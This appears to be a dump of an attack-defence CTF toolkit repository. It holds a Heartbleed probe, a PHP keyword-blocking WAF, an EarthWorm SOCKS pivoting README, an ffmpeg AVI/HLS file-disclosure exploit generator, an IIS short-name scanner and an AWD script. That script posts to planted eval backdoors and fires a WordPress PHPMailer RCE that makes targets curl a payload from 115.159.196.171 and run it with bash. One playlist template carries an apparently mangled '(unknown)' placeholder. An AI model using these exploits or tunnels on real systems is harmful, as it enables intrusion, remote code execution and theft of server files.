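            remain -= len(data)
    return rdata


def recvmsg(s):
    """Read one TLS record from *s*.

    Returns:
        ``(content_type, version, payload)``, or ``(None, None, None)`` if
        the connection closed (or timed out) before a full record arrived.
        The 5-byte header is big-endian: 1-byte type, 2-byte version,
        2-byte payload length.
    """
    hdr = recvall(s, 5)
    if hdr is None:
        print('Unexpected EOF receiving record header - server closed connection')
        return None, None, None
    typ, ver, ln = struct.unpack('>BHH', hdr)
    pay = recvall(s, ln, 10)
    if pay is None:
        print('Unexpected EOF receiving record payload - server closed connection')
        return None, None, None
    print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))
    return typ, ver, pay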
82 |
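def hit_hb(s):
    """Send the malformed heartbeat and classify the server's reply.

    Args:
        s: connected socket that has already completed the ClientHello /
            ServerHelloDone exchange.

    Returns:
        True if a heartbeat record (type 24) came back, printing a warning
        when it carried more than the 3 bytes a correct server may return;
        False if the server closed the connection or replied with an alert
        (type 21). Records of any other type are skipped until one of those
        arrives.
    """
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)
        if typ is None:
            print('No heartbeat response received, server likely not vulnerable')
            return False

        if typ == 24:
            print('Received heartbeat response:')
            hexdump(pay)
            if len(pay) > 3:
                print('WARNING: server returned more data than it should - server is vulnerable!')
            else:
                print('Server processed malformed heartbeat, but did not return any extra data.')
            return True

        if typ == 21:
            print('Received alert:')
            hexdump(pay)
            print('Server returned error, likely not vulnerable')
            return False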
105 |
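def main():
    """Connect to the target, finish the ClientHello exchange, then probe.

    The server comes from the first positional argument and the port from
    ``-p``; progress is printed on stdout. The socket is always closed on
    the way out, whichever branch returns.
    """
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print('Connecting...')
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        print('Sending Client Hello...')
        sys.stdout.flush()
        s.send(hello)
        print('Waiting for Server Hello...')
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print('Server closed connection without sending Server Hello.')
                return
            # Handshake record (22) whose first byte is ServerHelloDone (0x0E).
            if typ == 22 and bytearray(pay)[0] == 0x0E:
                break

        print('Sending heartbeat request...')
        sys.stdout.flush()
        # hit_hb() sends the same record again; the duplicate is kept as
        # published so the on-the-wire behaviour is unchanged.
        s.send(hb)
        hit_hb(s)
    finally:
        s.close()


if __name__ == '__main__':
    main()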
137 |
--------------------------------------------------------------------------------
/flowscript/waf.php:
--------------------------------------------------------------------------------
1 | checkips = array('127.0.0.1');
11 | $this->flowdata = array();
12 | // Redirect
13 | $this->redirect = false;
14 | // files
15 | $this->logfiles = $_SERVER['DOCUMENT_ROOT'].'/logfiles/';
16 | if(!file_exists($this->logfiles)){
17 | mkdir($this->logfiles,0777,true);
18 | }
19 | // Run
20 | $this->Flow();
21 | }
22 |
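/**
 * Collect the current request into $this->flowdata and scan every part of it.
 *
 * Records the method, a few request headers, URI, protocol, the client IP
 * candidates, time, content type, the request body (form-encoded bodies as
 * JSON of $_POST, anything else raw) and uploaded files, then runs Scan()
 * over each value. Scan() die()s on a hit, so this either returns normally
 * or ends the request. The redirect branch only fires when $this->redirect
 * holds a host (the constructor sets it to false).
 *
 * Fixes over the original: missing $_SERVER keys no longer raise notices,
 * the body check used a non-existent 'Method' key, $_FILES entries were read
 * with non-existent 'file_name'/'file_size' keys, and two writes went through
 * the typo '$this->this'.
 */
public function Flow()
{
    /* Method */
    $this->flowdata['method'] = $_SERVER['REQUEST_METHOD'];
    /* Header */
    $arr = array(
        'HTTP_HOST',
        'HTTP_REFERER',
        'HTTP_USER_AGENT'
    );
    foreach ($arr as $key) {
        // Absent headers are stored as '' instead of raising a notice.
        $name = ucwords(strtolower(str_replace("HTTP_", "", $key)));
        $this->flowdata['header'][$name] = isset($_SERVER[$key]) ? $_SERVER[$key] : '';
    }
    /* Url */
    $this->flowdata['uri'] = $_SERVER['REQUEST_URI'];
    /* Protocol */
    $this->flowdata['protocol'] = $_SERVER['SERVER_PROTOCOL'];
    /* IP: REMOTE_ADDR is what the socket says; the other two are
       client-supplied headers and must never be used for access decisions. */
    $this->flowdata['ip'] = array(
        'REMOTE_ADDR'     => $_SERVER['REMOTE_ADDR'],
        'CLIENT_IP'       => isset($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : '',
        'X_FORWARDED_FOR' => isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : ''
    );
    /* Time */
    $this->flowdata['time'] = date('Y-m-d H:i:s', $_SERVER['REQUEST_TIME']);
    /* CONTENT_TYPE (absent on bodiless requests) */
    $this->flowdata['ctype'] = isset($_SERVER['CONTENT_TYPE']) ? $_SERVER['CONTENT_TYPE'] : '';
    /* Body: captured for every request, as before (the original guard
       isset($_POST) is always true); a GET simply yields an empty string. */
    if ($this->flowdata['ctype'] == 'application/x-www-form-urlencoded') {
        $this->flowdata['post'] = json_encode($_POST);
    } else {
        $this->flowdata['post'] = file_get_contents('php://input');
    }
    /* File uploads: $_FILES entries carry 'name', 'size' and 'tmp_name'. */
    if (!empty($_FILES)) {
        foreach ($_FILES as $key => $fileobj) {
            if (!isset($fileobj['tmp_name']) || !is_uploaded_file($fileobj['tmp_name'])) {
                continue; //  failed/partial upload, nothing to read
            }
            // basename() keeps the client from steering the path with ../
            $bn = $this->logfiles . md5(time()) . '_' . basename($fileobj['name']);
            $this->flowdata['filedata'][$key]['name'] = $bn;
            $filedata = file_get_contents($fileobj['tmp_name']);
            if ($fileobj['size'] < 1024) {
                $this->flowdata['filedata'][$key]['data'] = $filedata;
            } else {
                // NOTE(review): $this->logfiles is created under DOCUMENT_ROOT
                // by the constructor, so this copy of an attacker's upload
                // (including a .php file) is reachable at /logfiles/<md5>_<name>
                // and may be executed by the web server. Store it outside the
                // web root or drop the original extension before shipping this.
                file_put_contents($bn, $filedata);
                $this->Scan($filedata);
            }
        }
    }
    foreach ($this->flowdata as $key => $value) {
        $this->Scan($value);
    }
    // Optional: bounce the request to another host instead of serving it.
    if ($this->redirect) {
        header("Location: http://" . $this->redirect . $_SERVER['REQUEST_URI']);
        exit('this is waf.....');
    }
}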
89 |
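/**
 * Block the request if $input matches the attack keyword list.
 *
 * Arrays (flowdata['header'], ['ip'], ['filedata']) are walked recursively;
 * the original handed them straight to preg_match_all, which only emits a
 * warning and never matches, so those parts of the request were effectively
 * unscanned. On a hit the matched keywords are logged via Send() and the
 * request is ended with die().
 *
 * The list is plain substring matching and deliberately aggressive for an
 * attack/defence game: 'and', 'sub', 'dl', 'hex' and 'flag' also fire on
 * ordinary words ("android", "submit", "handle"), so expect false positives
 * on normal traffic.
 *
 * @param mixed $input string, scalar, or (nested) array of them
 */
public function Scan($input)
{
    if (is_array($input)) {
        foreach ($input as $item) {
            $this->Scan($item);
        }
        return;
    }
    if (!is_string($input)) {
        $input = (string) $input; // same coercion preg_match_all applied before
    }
    $pattern = "select|insert|update|delete|and|union|load_file|outfile|dumpfile|sub|hex|flag"; // sql inject
    $pattern .= "|file_put_contents|fwrite|eval|assert|file:\/\/";
    $pattern .= "|passthru|exec|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore";
    $pattern .= "|`|dl|openlog|syslog|readlink|symlink|popepassthru|stream_socket_server|pcntl_exec";
    if (preg_match_all("/$pattern/i", $input, $matches)) {
        $this->Send(json_encode($matches[0]));
        // WAF: stop the request here; the matched keywords are the reply.
        die(json_encode($matches[0]));
    }
}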
108 |
/**
 * Append a record for the current request to the log file.
 *
 * @param string $keyword free-form label; Flow()/Scan() pass the JSON list of
 *                        matched keywords. It is written first, followed by a
 *                        print_r dump of $this->flowdata and a separator line.
 * @return int always 0
 *
 * NOTE(review): the file is /tmp/<day>-<hour>.log where date('h') is the
 * 12-hour clock, so 03:00 and 15:00 share one file, and /tmp is world
 * writable, so any local user can pre-create or symlink the predictable name.
 */
public function Send($keyword)
{
    $logpath = "/tmp/" . date("d-h") . ".log";
    $record = implode("\r\n", array(
        $keyword,
        print_r($this->flowdata, true),
        "=====================================\r\n",
    ));
    file_put_contents($logpath, $record, FILE_APPEND);
    return 0;
}
117 |
118 | }
119 |
// Instantiating runs the whole pipeline at include time: the constructor
// calls Flow(), which captures and scans the request (and may die()) before
// the including script continues. What the constructor does with the
// argument is not visible in this listing.
new PhpFlowLog('test');
121 |
122 | ?>
123 |
--------------------------------------------------------------------------------
/proxy/Earthworm/Readme.txt:
--------------------------------------------------------------------------------
1 | 【软件介绍】
2 |
3 | EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。
4 | 专有主页: http://rootkiter.com/EarthWorm/
5 |
6 | 【使用场景】
7 |
8 | 普通网络环境:
9 | 1. 目标网络边界存在公网IP且可任意开监听端口:
10 |
11 | +---------+ +-------------------+
12 | |HackTools| ->> | 8888-> 1.1.1.1 |
13 | +---------+ +-------------------+
14 |
15 | a)./ew -s ssocksd -l 8888
16 | // 在 1.1.1.1 主机上通过这个命令开启 8888 端口的 socks 代理
17 | b) HackTools 可通过访问 1.1.1.1:8888 端口使用 1.1.1.1 主机提供的代理
18 |
19 | 2. 目标网络边界不存在公网 IP,需要通过反弹方式创建 socks 代理
20 |
21 | 一台可控公网IP主机 可控内网主机
22 | +---------+ +--------------------------+ | +---------------+
23 | |HackTools| ->> | 1080 -> 1.1.1.1 -> 8888 | 防火墙 | <-- 2.2.2.2 |
24 | +---------+ +--------------------------+ | +---------------+
25 |
26 | a) ./ew -s rcsocks -l 1080 -e 8888
27 | // 在 1.1.1.1 的公网主机添加转接隧道,将 1080 收到的代理请求转交给反连 8888 端口的主机
28 | b) ./ew -s rssocks -d 1.1.1.1 -e 8888
29 | // 将目标网络的可控边界主机反向连接公网主机
30 |
31 | c) HackTools 可通过访问 1.1.1.1:1080 端口使用 rssocks 主机提供的 socks5 代理服务
32 |
33 | 对于二重网络环境:
34 | 1. 获得目标网络内两台主机 A、B 的权限,情况描述如下:
35 |
36 | A 主机: 存在公网 IP,且自由监听任意端口,无法访问特定资源
37 | B 主机: 目标网络内部主机,可访问特定资源,但无法访问公网
38 | A 主机可直连 B 主机
39 |
40 | 可控边界主机A 可访问指定资源的主机B
41 | +---------+ +-----------------------+ +-----------------+
42 | |HackTools| ->> | 1080 --> 2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 |
43 | +---------+ +-----------------------+ +-----------------+
44 |
45 | a) ./ew -s ssocksd -l 9999
46 | // 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理
47 | b) ./ew -s lcx_tran -l 1080 -f 2.2.2.3 -g 9999
48 | // 将 1080 端口收到的 socks 代理请求转交给 2.2.2.3 的主机。
49 | c) HackTools 可通过访问 2.2.2.2:1080 来使用 2.2.2.3 主机提供的 socks5 代理。
50 |
51 | 2. 获得目标网络内两台主机 A、B 的权限,情况描述如下:
52 |
53 | A 主机: 目标网络的边界主机,无公网 IP,无法访问特定资源。
54 | B 主机: 目标网络内部主机,可访问特定资源,却无法回连公网。
55 |
56 | A 主机可直连 B 主机
57 | 一台可控公网IP主机 可控内网主机A 可访问指定资源的主机B
58 | +---------+ +--------------------------+ | +-----------------+ +-----------------+
59 | |HackTools| ->> | 1080 -> 1.1.1.1 -> 8888 | 防火墙 | <-- 2.2.2.2 --> | ->> | 9999 -> 2.2.2.3 |
60 | +---------+ +--------------------------+ | +-----------------+ +-----------------+
61 |
62 | a) ./ew -s lcx_listen -l 1080 -e 8888
63 | // 在 1.1.1.1 公网主机添加转接隧道,将 1080 收到的代理请求
64 | // 转交给反连 8888 端口的主机
65 | b) ./ew -s ssocksd -l 9999
66 | // 在 2.2.2.3 主机上利用 ssocksd 方式启动 9999 端口的 socks 代理
67 | c) ./ew -s lcx_slave -d 1.1.1.1 -e 8888 -f 2.2.2.3 -g 9999
68 | // 在 2.2.2.2 上,通过工具的 lcx_slave 方式,打通1.1.1.1:8888 和 2.2.2.3:9999 之间的通讯隧道
69 | d) HackTools 可通过访问 1.1.1.1:1080 来使用 2.2.2.3 主机提供的 socks5 代理
70 |
71 |
72 | 【参数说明】
73 |
74 | 目前工具提供六种链路状态,可通过 -s 参数进行选定,分别为:
75 |
76 | ssocksd rcsocks rssocks
77 | lcx_slave lcx_tran lcx_listen
78 |
79 | 其中 SOCKS5 服务的核心逻辑支持由 ssocksd 和 rssocks 提供,分别对应正向与反向socks代理。
80 |
81 | 其余的 lcx 链路状态用于打通测试主机同 socks 服务器之间的通路。
82 |
83 | lcx 类别管道:
84 |
85 | lcx_slave 该管道一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机。
86 | lcx_tran 该管道,通过监听本地端口接收代理请求,并转交给代理提供主机。
87 | lcx_listen 该管道,通过监听本地端口接收数据,并将其转交给目标网络回连的代理提供主机。
88 |
89 | 通过组合lcx类别管道的特性,可以实现多层内网环境下的渗透测试。
90 |
91 | 下面是一个三级跳的本地测试例子。。。
92 | ./ew -s rcsocks -l 1080 -e 8888
93 | ./ew -s lcx_slave -d 127.0.0.1 -e 8888 -f 127.0.0.1 -g 9999
94 | I:\www\ew.exe -s lcx_slave -f 127.0.0.1 -g 3389 -d 172.17.137.9 -e 9999
95 | ./ew -s lcx_listen -l 9999 -e 7777
96 | ./ew -s rssocks -d 127.0.0.1 -e 7777
97 |
98 | 数据流向为 IE -> 1080 -> 8888 -> 9999 -> 7777 -> rssocks
99 |
100 | 【补充说明】
101 | 1.为了减少网络资源的消耗,程序中添加了超时机制,默认时间为10000毫秒(10秒),
102 | 用户可以通过追加 -t 参数来调整这个值,单位为毫秒。在多级级联功能中,超时机制
103 | 将以隧道中最短的时间为默认值。
104 | 2.单纯从设计原理上讲,多级级联的三种状态可以转发任意以TCP为基础的通讯服务,
105 | 包括远程桌面/web服务 等。
106 | 3.产品包中的 ew_for_Arm32 在开发者已有平台下(android手机、小米路由器、树莓派) 测试无误。
107 | 如果有其它异常环境请将对应详细细节反馈给作者,以便更新程序问题。
108 |
109 | 【联系作者】
110 |
111 | rootkiter@rootkiter.com
112 | 如果您在使用中有什么好想法,或遇到什么BUG,都可以主动联系我。
113 | 我会尽最大所能让这个工具更加完美,感谢大家的支持。
114 |
--------------------------------------------------------------------------------
/gen_xbin_avi.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | import struct
3 | import argparse
4 | import random
5 | import string
6 |
# Fixed RIFF/AVI preamble (hdrl with one 'txts' stream, XVID strf) up to and
# including the 'LIST movi' tag; make_playlist_avi appends the movi payload.
# Byte-exact; do not reflow.
AVI_HEADER = b"RIFF\x00\x00\x00\x00AVI LIST\x14\x01\x00\x00hdrlavih8\x00\x00\x00@\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00}\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LISTt\x00\x00\x00strlstrh8\x00\x00\x00txts\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x00\x00\x00\x00}\x00\x00\x00\x86\x03\x00\x00\x10'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\xa0\x00strf(\x00\x00\x00(\x00\x00\x00\xe0\x00\x00\x00\xa0\x00\x00\x00\x01\x00\x18\x00XVID\x00H\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00LIST movi"

# One HLS segment that "echoes" a chosen 16-byte block: 16 bytes of
# /dev/zero are AES-128-CBC decrypted under the all-zero key (URI=/dev/zero)
# with an IV picked by echo_block() so the plaintext equals {needed}.
ECHO_TEMPLATE = """### echoing {needed!r}
#EXT-X-KEY: METHOD=AES-128, URI=/dev/zero, IV=0x{iv}
#EXTINF:1,
#EXT-X-BYTERANGE: 16
/dev/zero
#EXT-X-KEY: METHOD=NONE
"""

# AES.new('\x00'*16).decrypt('\x00'*16)
# i.e. the AES-128 decryption of a zero block under the zero key. CBC gives
# plaintext = D_k(ciphertext) XOR IV, so IV = wanted XOR GAMMA yields `wanted`
# (see echo_block).
GAMMA = b'\x14\x0f\x0f\x10\x11\xb5"=yXw\x17\xff\xd9\xec:'

# Outer playlist skeleton; {rand} is a random trailer so caches do not
# serve a stale copy.
FULL_PLAYLIST = """#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
{content}
#### random string to prevent caching: {rand}
#EXT-X-ENDLIST"""

# Segment that reads {size} bytes at {offset} from a server-side file.
# NOTE(review): the literal "(unknown)" below looks like a mangled
# placeholder: gen_xbin_packet_playlist passes filename=... to .format(),
# which this template never consumes, so the generated playlist reads
# from a file named "(unknown)". Confirm against the upstream source
# before using.
EXTERNAL_REFERENCE_PLAYLIST = """

#### External reference: reading {size} bytes from (unknown) (offset {offset})
#EXTINF:1,
#EXT-X-BYTERANGE: {size}@{offset}
(unknown)


"""

# 16-byte XBIN file header ('XBIN' magic + 12 header bytes); emitted first
# by gen_xbin_playlist via echo_block. Byte-exact.
XBIN_HEADER = b'XBIN\x1A\x20\x00\x0f\x00\x10\x04\x01\x00\x00\x00\x00'
37 |
38 |
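def echo_block(block):
    """Return an HLS segment that makes the player "echo" *block* verbatim.

    The segment decrypts 16 zero bytes (/dev/zero) with AES-128-CBC under the
    all-zero key. CBC gives P = D_k(C) XOR IV and D_0(0) is GAMMA, so choosing
    IV = block XOR GAMMA makes the decrypted plaintext equal *block*.

    Args:
        block: exactly 16 bytes (or 16 ints).

    Returns:
        The filled-in ECHO_TEMPLATE text.

    Raises:
        ValueError: if *block* is not 16 bytes long. (The original used a
            bare assert, which ``python -O`` strips.)
    """
    if len(block) != 16:
        raise ValueError("block must be exactly 16 bytes, got %d" % len(block))
    iv = ''.join('{:02x}'.format(x ^ y) for x, y in zip(block, GAMMA))
    return ECHO_TEMPLATE.format(needed=block, iv=iv)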
43 |
44 |
def gen_xbin_sync():
    """Build the XBIN "sync" byte sequence placed between packet groups.

    Layout:
      * 60 bytes alternating a run header ``191 - i`` (even i) with 0 (odd i);
      * 4 run headers 131..128, each followed by two zero bytes;
      * 12 run headers 139..128, each followed by two zero bytes.

    The result is validated by test_xbin_sync() at import time.

    Returns:
        list of 108 ints.
    """
    seq = [0 if i % 2 else 128 + 64 - i - 1 for i in range(60)]
    for count in (4, 12):
        for i in range(count, 0, -1):
            seq.extend((128 + i - 1, 0, 0))
    return seq
61 |
62 |
63 | def test_xbin_sync(seq):
64 | for start_ind in range(64):
65 | path = [start_ind]
66 | cur_ind = start_ind
67 | while cur_ind < len(seq):
68 | if seq[cur_ind] == 0:
69 | cur_ind += 3
70 | else:
71 | assert seq[cur_ind] & (64 + 128) == 128
72 | cur_ind += (seq[cur_ind] & 63) + 3
73 | path.append(cur_ind)
74 | assert cur_ind == len(seq), "problem for path {}".format(path)
75 |
76 |
def echo_seq(s):
    """Echo a 16-byte-aligned byte string, one echo_block() segment per block.

    Args:
        s: bytes (or a list of ints) whose length is a multiple of 16.

    Returns:
        The concatenated segments as one string.

    Raises:
        AssertionError: if the length is not a multiple of 16.
    """
    assert len(s) % 16 == 0
    chunks = (s[off:off + 16] for off in range(0, len(s), 16))
    return ''.join(echo_block(chunk) for chunk in chunks)
83 |
84 |
# Import-time self-check: the sync sequence must resynchronise from every
# start offset before it is baked into SYNC.
_sync_bytes = gen_xbin_sync()
test_xbin_sync(_sync_bytes)
SYNC = echo_seq(_sync_bytes)
88 |
89 |
90 | def make_playlist_avi(playlist, fake_packets=1000, fake_packet_len=3):
91 | content = b'GAB2\x00\x02\x00' + b'\x00' * 10 + playlist.encode('ascii')
92 | packet = b'00tx' + struct.pack(' 0:
105 | packet_size -= 16
106 | assert packet_size > 0
107 | part_size = min(packet_size, 64)
108 | packet_size -= part_size
109 | result.append(echo_block(gen_xbin_packet_header(part_size)))
110 | result.append(
111 | EXTERNAL_REFERENCE_PLAYLIST.format(
112 | size=part_size,
113 | offset=offset,
114 | filename=filename))
115 | offset += part_size
116 | return ''.join(result), offset
117 |
118 |
def gen_xbin_playlist(filename_to_read):
    """Build the full M3U playlist that leaks *filename_to_read* through XBIN.

    The playlist starts by echoing the XBIN header, then emits packets ten at
    a time — first over the target file until the offset passes 5000, then
    over file:///dev/zero until it passes 500 — appending the SYNC sequence
    after every group of ten. Only the very first packet is sized with a
    delta of 5; every later one uses 0.

    Args:
        filename_to_read: URL (with an explicit scheme) the server-side
            ffmpeg will open.

    Returns:
        The playlist text, ending with a random trailer to defeat caching.
    """
    parts = [echo_block(XBIN_HEADER)]
    delta = 5
    targets = ((5000, filename_to_read), (500, "file:///dev/zero"))
    for limit, source in targets:
        pos = 0
        while pos < limit:
            for _ in range(10):
                chunk, pos = gen_xbin_packet_playlist(source, pos, 0xf0 - delta)
                parts.append(chunk)
                delta = 0
            parts.append(SYNC)
    nonce = ''.join(random.choice(string.ascii_lowercase) for _ in range(30))
    return FULL_PLAYLIST.format(content=''.join(parts), rand=nonce)
135 |
136 |
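if __name__ == "__main__":
    parser = argparse.ArgumentParser('AVI+M3U+XBIN ffmpeg exploit generator')
    parser.add_argument(
        'filename',
        help='filename to be read from the server (prefix it with "file://")')
    parser.add_argument('output_avi', help='where to save the avi')
    args = parser.parse_args()
    # Validate with parser.error() rather than assert: assert is stripped
    # under python -O, and error() prints usage and exits with status 2.
    if '://' not in args.filename:
        parser.error("ffmpeg needs explicit proto (forgot file://?)")
    content = gen_xbin_playlist(args.filename)
    avi = make_playlist_avi(content)
    with open(args.output_avi, 'wb') as f:
        f.write(avi)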
--------------------------------------------------------------------------------
/tools/iis_shortname_Scan.py:
--------------------------------------------------------------------------------
1 | # encoding=gbk
2 | # An IIS short_name scanner my[at]lijiejie.com http://www.lijiejie.com
3 |
4 | import sys
5 | import httplib
6 | import urlparse
7 | import string
8 | import threading
9 | import Queue
10 | import time
11 | import string
12 |
13 |
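class Scanner():
    """Enumerate IIS 8.3 short names (the "tilde" disclosure) under one URL.

    The probe relies on IIS answering 404 for a wildcard path that matches an
    existing short name and 400 for one that matches nothing. Candidate names
    are grown one character at a time by a small thread pool; only the first
    six name characters are enumerated, and a name shorter than six characters
    is never handed to the extension phase (a limitation of the original
    algorithm that is kept here).
    """

    def __init__(self, target):
        """Parse *target* (scheme://host[:port]/path) and set up worker state."""
        self.target = target
        self.scheme, self.netloc, self.path, params, query, fragment = \
            urlparse.urlparse(target)
        if self.path[-1:] != '/':  # make sure the path ends with a slash
            self.path += '/'
        self.payloads = list('abcdefghijklmnopqrstuvwxyz0123456789_-')
        self.files = []
        self.dirs = []
        self.queue = Queue.Queue()
        self.lock = threading.Lock()
        self.threads = []

    def _conn(self):
        """Return a new (not yet connected) HTTP or HTTPS connection to the target.

        Raises:
            Exception: re-raised from the connection constructor after being
                printed. The original returned None here, which then failed in
                the caller with a bare AttributeError.
        """
        try:
            if self.scheme == 'https':
                return httplib.HTTPSConnection(self.netloc)
            return httplib.HTTPConnection(self.netloc)
        except Exception as e:
            print('[Exception in function _conn] %s' % e)
            raise

    def _get_status(self, path):
        """GET *path* and return the HTTP status code, always closing the connection.

        Raises:
            Exception: wrapping any connection or request failure.
        """
        try:
            conn = self._conn()
            try:
                conn.request('GET', path)
                return conn.getresponse().status
            finally:
                conn.close()  # the original leaked the socket on any error
        except Exception as e:
            raise Exception('[Exception in function _get_status] %s' % str(e))

    def is_vul(self):
        """Probe the root path; True if the server shows the short-name behaviour.

        A wildcard that matches something ('/*~1****/') should give 404 while a
        wildcard that cannot match ('/l1j1e*~1****/') should give 400.
        """
        try:
            exists = self._get_status(self.path + '/*~1****/a.aspx')
            absent = self._get_status(self.path + '/l1j1e*~1****/a.aspx')
            return exists == 404 and absent == 400
        except Exception as e:
            raise Exception('[Exception in function is_vul] %s' % str(e))

    def run(self):
        """Seed the queue with every first character and start 10 worker threads."""
        for payload in self.payloads:
            self.queue.put((self.path + payload, '****'))  # (name prefix, extension mask)
        for _ in range(10):
            t = threading.Thread(target=self._scan_worker)
            self.threads.append(t)
            t.start()

    def report(self):
        """Wait for the workers, then print every directory and file found."""
        for t in self.threads:
            t.join()
        self._print('-' * 64)
        for d in self.dirs:
            self._print('Dir: ' + d)
        for f in self.files:
            self._print('File: ' + f)
        self._print('-' * 64)
        self._print('%d Directories, %d Files found in total' % (len(self.dirs), len(self.files)))

    def _print(self, msg):
        """Print *msg* under the shared lock so worker output does not interleave."""
        with self.lock:
            print(msg)

    def _scan_worker(self):
        """Consume (prefix, ext) jobs until the queue has been empty for 3 s.

        A 404 means the prefix matches a short name: extend it by one more
        character (up to 6), then enumerate a three-letter extension, or
        record it as a directory when the extension mask is empty.
        """
        while True:
            try:
                url, ext = self.queue.get(timeout=3)
            except Queue.Empty:
                break  # nothing left to do
            try:
                status = self._get_status(url + '*~1' + ext + '/1.aspx')
            except Exception as e:
                # The original ended the worker on any request error; log it
                # and keep going so one timeout does not silently end the scan.
                self._print('[Error] %s' % e)
                continue
            if status != 404:
                continue
            self._print('Found ' + url + ext + '\t[scan in progress]')

            if len(url) - len(self.path) < 6:  # enumerate the first 6 chars only
                for payload in self.payloads:
                    self.queue.put((url + payload, ext))
            elif ext == '****':  # name done; start on the extension
                for payload in string.ascii_lowercase:
                    self.queue.put((url, '*' + payload + '**'))
                self.queue.put((url, ''))  # it may also be a folder
            elif ext.count('*') == 3:
                for payload in string.ascii_lowercase:
                    self.queue.put((url, '*' + ext[1] + payload + '*'))
            elif ext.count('*') == 2:
                for payload in string.ascii_lowercase:
                    self.queue.put((url, '*' + ext[1] + ext[2] + payload))
            elif ext == '':
                self.dirs.append(url + '~1')
                self._print('Found Dir ' + url + '~1\t[Done]')
            elif ext.count('*') == 1:
                self.files.append(url + '~1.' + ext[1:])
                self._print('Found File ' + url + '~1.' + ext[1:] + '\t[Done]')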
119 |
120 |
121 |
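if len(sys.argv) == 1:
    print('Usage: %s target' % sys.argv[0])
    sys.exit()

# The single argument is a file with one target URL per line. Each target is
# probed once and vulnerable ones are appended to vul.txt; the full
# enumeration (run/report) stays disabled as in the original.
targets_path = sys.argv[1]  # 'file' in the original shadowed the builtin
with open(targets_path, 'r') as targets, open('vul.txt', 'a+') as vulnerable:
    for target in targets:
        target = target.strip()
        if not target:
            continue  # skip blank lines instead of probing an empty URL
        print(target)
        s = Scanner(target)
        if not s.is_vul():
            print('NOT vulnerable')
        else:
            vulnerable.write(target + '\n')
            print('server is vulnerable')
            # s.run()
            # s.report()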
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/awd/fuck.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import requests
3 | import re
4 | import time
5 |
req = None  # placeholder; nothing visible in this listing reads or assigns it

# Flag-submission settings. The credentials are intentionally left blank.
TOKEN = ""
SUBMIT_URL = "http://192.168.80.1/lms/portal/sp/hz_flag.php"
SUBMIT_U = ""
SUBMIT_P = ""

# Target hosts (no scheme); the consumers are not visible in this listing.
URLS = [
    '40.10.10.57', '40.10.10.26', '40.10.10.11', '40.10.10.62',
    '40.10.10.47', '40.10.10.42', '40.10.10.15',
]
21 |
22 |
def poc(url):
    """Placeholder resolver: the shell URL is simply *url*, unchanged."""
    return url
26 |
27 |
def poc_eval_backdoor_getflag_1(shellurl):
    """POST the eval payload to an already-planted backdoor; print and return its reply.

    Args:
        shellurl: URL of the backdoor that evaluates the ``s`` form field.

    Returns:
        The response body when the status is 200, otherwise None.

    NOTE(review): ``evalcode`` is not defined anywhere in this listing, so the
    call raises NameError until it is bound (as a global or a parameter).
    The Python 2 ``print`` statement below is a SyntaxError on Python 3.
    """
    data = {
        "s": evalcode
    }
    res = requests.post(shellurl, data=data, timeout=5)
    if res.status_code == 200:
        print res.content
        return res.content
36 |
37 |
def generate_command(command):
    """Wrap a shell command in the Exim string-expansion form used in the Host header.

    Slashes and spaces cannot be written literally in the injected value, so
    they are rewritten as Exim ``${substr...}`` expansions intended to yield
    '/' (first character of $spool_directory) and ' ' (11th character of
    $tod_log). The poc_wordpress_phpmail_* helpers put the result in the
    Host header.

    Args:
        command: shell command line to run on the target.

    Returns:
        ``target(any -froot@localhost -be <expansion> null)``.
    """
    slash = '${substr{0}{1}{$spool_directory}}'
    space = '${substr{10}{1}{$tod_log}}'
    expansion = '${run{%s}}' % command
    expansion = expansion.replace('/', slash).replace(' ', space)
    return 'target(any -froot@localhost -be %s null)' % expansion
43 |
44 |
def poc_wordpress_phpmail_rce_shell(url):
    """Send two lost-password POSTs to http://<url>/wp-login.php with a crafted Host header.

    Each Host header is generate_command() output: the first request makes
    the mailer fetch <shell_url> to /tmp/rce with curl, the second runs that
    file with bash. Both requests use allow_redirects=False and neither
    response is inspected, so the function returns None and gives no success
    indication. The download host 115.159.196.171 is hard-coded.
    Indicators on the target: a lost-password POST whose Host header contains
    `${run{`, an outbound fetch from the web server to that address, and a
    new file in /tmp.
    """
    target = 'http://{}'.format(url)
    shell_url = '115.159.196.171/rce.txt'
    user = 'admin'
    data = {
        'user_login': user,
        'redirect_to': '',
        'wp-submit': 'Get New Password'
    }
    headers = {
        'Host': generate_command('/usr/bin/curl -o /tmp/rce ' + shell_url),
        'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)'
    }
    target += '/wp-login.php?action=lostpassword'
    requests.post(target, headers=headers, data=data, allow_redirects=False)
